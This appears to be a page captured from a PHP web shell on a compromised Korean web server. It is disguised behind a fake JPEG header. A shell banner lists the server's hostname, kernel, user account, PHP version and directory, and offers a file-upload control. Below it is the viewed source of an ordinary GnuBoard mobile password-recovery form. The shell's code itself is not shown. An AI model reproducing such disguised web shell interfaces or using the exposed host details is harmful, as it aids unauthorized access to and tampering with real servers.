ÿØÿà JFIF ` ` ÿþ
Server : Apache System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : tkt_travelbus ( 1137) PHP Version : 7.0.0p1 Disable Function : mysql_pconnect Directory : /tkt_travelbus/www/skin/member/gnutwit/ |
Upload File : |
<? if (!defined("_GNUBOARD_")) exit; // 개별 페이지 접근 불가 ?> <? include $DOCUMENT_ROOT."/mobile/inc/header.php"; ?> <section id="container"><!-- container start --> <section id="contents"><!-- contents start --> <aside class="path_area"><!-- path_area start --> <ul> <li><a href="/mobile/index.php"><img src="/mobile/image/common/icon_home.gif" alt="홈" /></a></li> <li><a href="/mobile/etc/login.php">로그인</a></li> </ul> </aside><!-- path_area end --> <section class="sub_start"><!-- sub_start start --> <header class="sub_header"><!-- sub_header start --> <h2 class="normal">로그인</h2> </header><!-- sub_header end --> <section class="sub_content"><!-- sub_content start --> <form name="fpasswordlost" method="post" onsubmit="return fpasswordlost_submit(this);" autocomplete="off"> <article class="border_box"><!-- border_box start --> <p class="title">아래사항을 입력하시면 아이디와 비밀번호 확인이 가능합니다.</p> <div class="find_boxL"><!-- find_box start --> <p><input type="text" name="mb_email" class="inp-nor" title="이메일주소" size="25" placeholder="이메일주소"/></p> <p><input type="text" name='wr_key' class="inp-nor" title="숫자 입력" placeholder="아래쪽의 숫자를 입력하세요"/></p> <p class="captchaL" style="margin-left:50px;"><img src="" id='kcaptcha_image' alt="자동등록방지"/></p><br/><br/><br/><br/><br/> </div><!-- find_box end --> <div class="btns_area"><!-- btns_area start --> <ul class="center_btns"> <li><button class="btn btn_orange">확인</button></li> <li><p class="btn"><a href="/mobile/index.php">취소</a></p></li> </ul> </div><!-- btns_area end --> </article><!-- terms_box end --> </article><!-- border_box end --> </form> </section><!-- sub_content end --> </section><!-- sub_start end --> </section><!-- contents end --> </section><!-- container end --> <hr /> <? include $DOCUMENT_ROOT."/mobile/inc/footer.php"; ?> <script type="text/javascript" src="<?="$g4[path]/js/md5.js"?>"></script> <script type="text/javascript" src="<?="$g4[path]/js/jquery.kcaptcha.js"?>"></script> <script type="text/javascript"> function fpasswordlost_submit(f) { if (hex_md5(f.wr_key.value) != md5_norobot_key) { alert("자동등록방지용 글자가 제대로 입력되지 않았습니다."); f.wr_key.select(); return false; } <? if ($g4[https_url]) echo "f.action = '$g4[https_url]/$g4[bbs]/password_lost2.php';"; else echo "f.action = './password_lost2.php';"; ?> return true; } self.focus(); document.fpasswordlost.mb_email.focus(); $(function() { var sw = screen.width; var sh = screen.height; var cw = document.body.clientWidth; var ch = document.body.clientHeight; var top = sh / 2 - ch / 2 - 100; var left = sw / 2 - cw / 2; moveTo(left, top); }); </script>